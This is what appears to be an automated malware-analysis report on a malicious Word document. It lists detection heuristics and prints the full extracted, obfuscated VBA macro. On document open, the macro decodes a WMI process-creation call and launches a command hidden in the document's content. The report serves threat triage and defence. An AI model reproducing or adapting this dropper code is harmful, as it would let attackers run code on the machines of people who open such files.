Verdict: MALICIOUS
Risk score: 172
Heuristics: 7
- ClamAV: Doc.Malware.Valyria-10034158-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-10034158-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set Jdm74rzs4y2p2zfm_u = VBA.GetObject(J8zona45gf3qr0)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Private Sub Document_open()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8529 bytes |

SHA-256: f3c1208957a8588b8a5352b63af9a94a87401fa2b1f98d6dafce63f68312781e

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 83 of 150 identifiers look randomly generated (e.g. 'Uyflg5ryl7s4km2pbn'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "A5ate73kc6cw5njy"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Swrnfbrhhv1hn8ci80
End Sub
Attribute VB_Name = "Zcf1kk3t2ssv4r07m"
Attribute VB_Name = "Gusca95luq_"
Function Swrnfbrhhv1hn8ci80()
GoTo IUHjJ
Const LpCFBdE As String = "A"
Const BvPhx As String = ","
Const XlUFJHR As String = "*high*,*critic*"
Dim HIXwxDo As Range: Set HIXwxDo = Array((LpCFBdE), Target)
If HIXwxDo Is Nothing Then
End If
Dim tCOXBDEPL() As String: tCOXBDEPL = Split(XlUFJHR, BvPhx)
IUHjJ:
skuwd = E1eikun_vqz38wvur + A5ate73kc6cw5njy _
. _
Content + Sbgh3kd2dneltk
GoTo elqXMZ
Const zHRlEdEP As String = "A"
Const uldHRAc As String = ","
Const rSrZBJJv As String = "*high*,*critic*"
Dim DKUOJzi As Range: Set DKUOJzi = Array((zHRlEdEP), Target)
If DKUOJzi Is Nothing Then
End If
Dim DGpFCB() As String: DGpFCB = Split(rSrZBJJv, uldHRAc)
elqXMZ:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
Rjwqx5pa0bii0zjv0 = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
GoTo prhgQCFm
Const bpMND As String = "A"
Const ixJTYF As String = ","
Const nvNjhAFA As String = "*high*,*critic*"
Dim vDIdCwGfT As Range: Set vDIdCwGfT = Array((bpMND), Target)
If vDIdCwGfT Is Nothing Then
End If
Dim PASRFGECE() As String: PASRFGECE = Split(nvNjhAFA, ixJTYF)
prhgQCFm:
Wti36fxa67_iliapeg = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
GoTo vEmIAMH
Const eGHABDHYI As String = "A"
Const wJdJAI As String = ","
Const DSEaFYQ As String = "*high*,*critic*"
Dim PdrYYCtJ As Range: Set PdrYYCtJ = Array((eGHABDHYI), Target)
If PdrYYCtJ Is Nothing Then
End If
Dim DunxEHX() As String: DunxEHX = Split(DSEaFYQ, wJdJAI)
vEmIAMH:
Qcpt8n14rllbi98 = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
GoTo ffeODEi
Const eBzEFGPxh As String = "A"
Const UsjaB As String = ","
Const sujuoHFCJ As String = "*high*,*critic*"
Dim kRgnIQJCn As Range: Set kRgnIQJCn = Array((eBzEFGPxh), Target)
If kRgnIQJCn Is Nothing Then
End If
Dim uZukAmEA() As String: uZukAmEA = Split(sujuoHFCJ, UsjaB)
ffeODEi:
Sq3vjdsxcq9piizr = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
GoTo zYRcUHEHG
Const xfQswJFE As String = "A"
Const lhhIDAA As String = ","
Const fEDGCAg As String = "*high*,*critic*"
Dim xjjUNmJ As Range: Set xjjUNmJ = Array((xfQswJFE), Target)
If xjjUNmJ Is Nothing Then
End If
Dim VZWOFv() As String: VZWOFv = Split(fEDGCAg, lhhIDAA)
zYRcUHEHG:
B8ot8fduc6wr = Qcpt8n14rllbi98 + Sq3vjdsxcq9piizr + Wti36fxa67_iliapeg + mjbBYHhbs + Rjwqx5pa0bii0zjv0
GoTo QFAdJG
Const yNpnD As String = "A"
Const ifTgDoG As String = ","
Const JjJbB As String = "*high*,*critic*"
Dim tuLCMCI As Range: Set tuLCMCI = Array((yNpnD), Target)
If tuLCMCI Is Nothing Then
End If
Dim aACrBzCHd() As String: aACrBzCHd = Split(JjJbB, ifTgDoG)
QFAdJG:
J8zona45gf3qr0 = K2eqcmojfn8ix90d6(B8ot8fduc6wr)
GoTo AQJEzpnoG
Const qtNpWFzCE As String = "A"
Const JaknVR As String = ","
Const riWqFGJY As String = "*high*,*critic*"
Dim lHXavB As Range: Set lHXavB = Array((qtNpWFzCE), Target)
If lHXavB Is Nothing Then
End If
Dim IOPMfG() As String: IOPMfG = Split(riWqFGJY, JaknVR)
AQJEzpnoG:
Set Jdm74rzs4y2p2zfm_u = VBA.GetObject(J8zona45gf3qr0)
GoTo YtjFBe
Const KAAmsFJLa As String = "A"
Const NFoIZAgdj As String = ","
Const sOfSqNO As String = "*high*,*critic*"
Dim espWEuWIh As Range: Set espWEuWIh = Array((KAAmsFJLa), Target)
If espWEuWIh Is Nothing Then
End If
Dim ZDKqIFEBG() As String: ZDKqIFEBG = Split(sOfSqNO, NFoIZAgdj)
YtjFBe:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = K2eqcmojfn8ix90d6(mxkikw)
GoTo LnRqcjdHC
Const muQUuJD As String = "A"
Const xBaZq As String = ","
Const urqwC As String = "*high*,*critic*"
Dim rykKLTfBV As Range: Set rykKLTfBV = Array((muQUuJD), Target)
If rykKLTfBV Is Nothing Then
End If
Dim xnvME() As String: xnvME = Split(urqwC, xBaZq)
LnRqcjdHC:
Jdm74rzs4y2p2zfm_u.Create pqwm, Alvw54nlrq0k5fkzbc, Y10e4jw1j3djjv0vy_
GoTo HsRXzxA
Const IKEyYJ As String = "A"
Const dBZlAG As String = ","
Const HYqcb As String = "*high*,*critic*"
Dim nEsTCdYDH As Range: Set nEsTCdYDH = Array((IKEyYJ), Target)
If nEsTCdYDH Is Nothing Then
End If
Dim PEoELvIQJ() As String: PEoELvIQJ = Split(HYqcb, dBZlAG)
HsRXzxA:
End Function
Function K2eqcmojfn8ix90d6(R3q4in34ym5v2il)
On Error Resume Next
GoTo VHxfT
Const jyxYAFLC As String = "A"
Const BJMbZuJRF As String = ","
Const XpIXCDhMq As String = "*high*,*critic*"
Dim LXXQDDfJ As Range: Set LXXQDDfJ = Array((jyxYAFLC), Target)
If LXXQDDfJ Is Nothing Then
End If
Dim kXidGGmrk() As String: kXidGGmrk = Split(XpIXCDhMq, BJMbZuJRF)
VHxfT:
Iuykcdayu0ux2dsn = R3q4in34ym5v2il
GoTo UTlaBhGD
Const jzCVAIVG As String = "A"
Const pNdoqWCxt As String = ","
Const WPKmFe As String = "*high*,*critic*"
Dim clPKFBjz As Range: Set clPKFBjz = Array((jzCVAIVG), Target)
If clPKFBjz Is Nothing Then
End If
Dim otHyDQA() As String: otHyDQA = Split(WPKmFe, pNdoqWCxt)
UTlaBhGD:
Pk_5b3ebff5osp = Qbtcycloqlj79qjl(Iuykcdayu0ux2dsn)
GoTo AQOwDFGF
Const SzdUE As String = "A"
Const SVfwH As String = ","
Const fsCkG As String = "*high*,*critic*"
Dim FGWgu As Range: Set FGWgu = Array((SzdUE), Target)
If FGWgu Is Nothing Then
End If
Dim cHCfACCC() As String: cHCfACCC = Split(fsCkG, SVfwH)
AQOwDFGF:
K2eqcmojfn8ix90d6 = Pk_5b3ebff5osp
GoTo ortGB
Const cyDODgZgJ As String = "A"
Const yPcgGA As String = ","
Const cpeHA As String = "*high*,*critic*"
Dim oAcbS As Range: Set oAcbS = Array((cyDODgZgJ), Target)
If oAcbS Is Nothing Then
End If
Dim RcxFVMDOH() As String: RcxFVMDOH = Split(cpeHA, yPcgGA)
ortGB:
End Function
Function Qbtcycloqlj79qjl(Uyflg5ryl7s4km2pbn)
GoTo kWUSef
Const WzIrJQJ As String = "A"
Const NYPQCHF As String = ","
Const TjMQdBBgE As String = "*high*,*critic*"
Dim gvcgAIUM As Range: Set gvcgAIUM = Array((WzIrJQJ), Target)
If gvcgAIUM Is Nothing Then
End If
Dim CNUcG() As String: CNUcG = Split(TjMQdBBgE, NYPQCHF)
kWUSef:
GoTo WiAHIOige
Const DObDSSSH As String = "A"
Const PCtZE As String = ","
Const PmuwJBJH As String = "*high*,*critic*"
Dim lrUBAA As Range: Set lrUBAA = Array((DObDSSSH), Target)
If lrUBAA Is Nothing Then
End If
Dim MhDEGJ() As String: MhDEGJ = Split(PmuwJBJH, PCtZE)
WiAHIOige:
GoTo PTpduh
Const dFuMF As String = "A"
Const IkIlHED As String = ","
Const ctRAim As String = "*high*,*critic*"
Dim PwyZCI As Range: Set PwyZCI = Array((dFuMF), Target)
If PwyZCI Is Nothing Then
End If
Dim tWLOCW() As String: tWLOCW = Split(ctRAim, IkIlHED)
PTpduh:
Qbtcycloqlj79qjl = Replace(Uyflg5ryl7s4km2pbn, "ns w" + "u db nd", Zqvivtw592lxn)
GoTo NGzByr
Const huVBjtENv As String = "A"
Const hxzoFBtLC As String = ","
Const sHhQm As String = "*high*,*critic*"
Dim wdpnM As Range: Set wdpnM = Array((huVBjtENv), Target)
If wdpnM Is Nothing Then
End If
Dim JtcSFJR() As String: JtcSFJR = Split(sHhQm, hxzoFBtLC)
NGzByr:
GoTo ArMYJEkJb
Const SbmMCGuEY As String = "A"
Const OwqxzJE As String = ","
Const NvjyW As String = "*high*,*critic*"
Dim cjdFFEGu As Range: Set cjdFFEGu = Array((SbmMCGuEY), Target)
If cjdFFEGu Is Nothing Then
End If
Dim mnSyJHAv() As String: mnSyJHAv = Split(NvjyW, OwqxzJE)
ArMYJEkJb:
GoTo JvTSZI
Const dvuZzGDnA As String = "A"
Const ZJSnRBDm As String = ","
Const VcboAE As String = "*high*,*critic*"
Dim HKXrDBEI As Range: Set HKXrDBEI = Array((dvuZzGDnA), Target)
If HKXrDBEI Is Nothing Then
End If
Dim OOobG() As String: OOobG = Split(VcboAE, ZJSnRBDm)
JvTSZI:
End Function